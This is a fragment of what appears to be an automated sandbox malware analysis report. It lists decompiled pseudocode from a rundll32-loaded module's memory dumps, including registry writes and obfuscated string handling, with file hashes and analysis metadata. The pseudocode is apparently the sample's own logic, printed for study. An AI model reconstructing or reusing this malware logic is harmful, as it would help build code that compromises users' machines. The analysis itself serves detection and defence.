                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C396A4(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr _t17;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t10 =  *0x4c3d270; // 0xd448b889
                                                                                                                                                                                                                                    				_v8 = _t10;
                                                                                                                                                                                                                                    				_v12 = _t10;
                                                                                                                                                                                                                                    				_t23 = 0; // executed
                                                                                                                                                                                                                                    				_t12 = E04C321CD(__ecx,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_t14 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					_t4 = _t14 + 0x4c3e796; // 0x74666f53
                                                                                                                                                                                                                                    					_t17 = E04C37A9A(_t4, 0);
                                                                                                                                                                                                                                    					 *0x4c3d33c = _t17;
                                                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                                                    						_t18 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_v8 = _v8 ^ 0x738bb12a;
                                                                                                                                                                                                                                    						_t8 = _t18 + 0x4c3e862; // 0x61636f4c
                                                                                                                                                                                                                                    						_t21 = E04C37A9A(_t8, 1);
                                                                                                                                                                                                                                    						 *0x4c3d344 = _t21;
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}













Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction ID: bd832aa519261c40106d56889c55850736870fd094121f86b0608dc765d69e43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F04FB9911119ABDB20DFB8D9849DE77FDEB09306F108063E502D7240E6B4EF04DB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E04C32436(intOrPtr* __edi) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 = __edi;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                    				_t19 = __imp__; // 0x76d26490
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                    					 *_t19(0x1f4); // executed
                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}










Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction ID: c077cb2e74d004b45afec248507e157982e599a806eeea00d2a37484c3300cee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF04975D01219EFDF00DB98D488AEDB7B8EF04306F1480EAE502A7201E3B56B84CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E04C324E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_v12 = _a16;
                                                                                                                                                                                                                                    				_t14 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t5 = _t14 + 0x4c3e10c; // 0x6c686b4
                                                                                                                                                                                                                                    				_t7 = _t14 + 0x4c3e2a4; // 0x650053
                                                                                                                                                                                                                                    				_v20 = 3;
                                                                                                                                                                                                                                    				_t16 = E04C39152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
                                                                                                                                                                                                                                    				return _t16;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction ID: 36fc8b55db0c4b338c47358043cb50035e8671347f461f19c7e448ff76c177b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01C76400109BEDF01DFA8C844CEAB7B9FB08304F018525FA05A6121E771EA159B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					__imp__(0x4c3d23c);
                                                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                                                    						E04C3970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t7 = _t4 - 1;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						__imp__(0x4c3d23c);
                                                                                                                                                                                                                                    						if(_t7 == 1) {
                                                                                                                                                                                                                                    							_t8 = E04C36A56(_t7, _t9, _t10, _v0); // executed
                                                                                                                                                                                                                                    							if(_t8 != 0) {
                                                                                                                                                                                                                                    								_t12 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                    					return E04C36B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t13 = E04C324E1(_a4, _a8, _a12, 1); // executed
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C3A66E(void* __edx, void* __edi, char _a4) {
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = E04C37323(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    				_t12 = _t7;
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_push(_t12);
                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					L04C35544();
                                                                                                                                                                                                                                    					 *((char*)(_t12 + __edi)) = 0;
                                                                                                                                                                                                                                    					E04C39039(_t7, _a4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC81() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E04C3ADE5(0x4c3c344, 0x4c3d15c); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC9C() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E04C3ADE5(0x4c3c344, 0x4c3d158); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                    0x04c3ac93
                                                                                                                                                                                                                                    0x04c3ac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%


                                                                                                                                                                                                                                    Non-executed Functions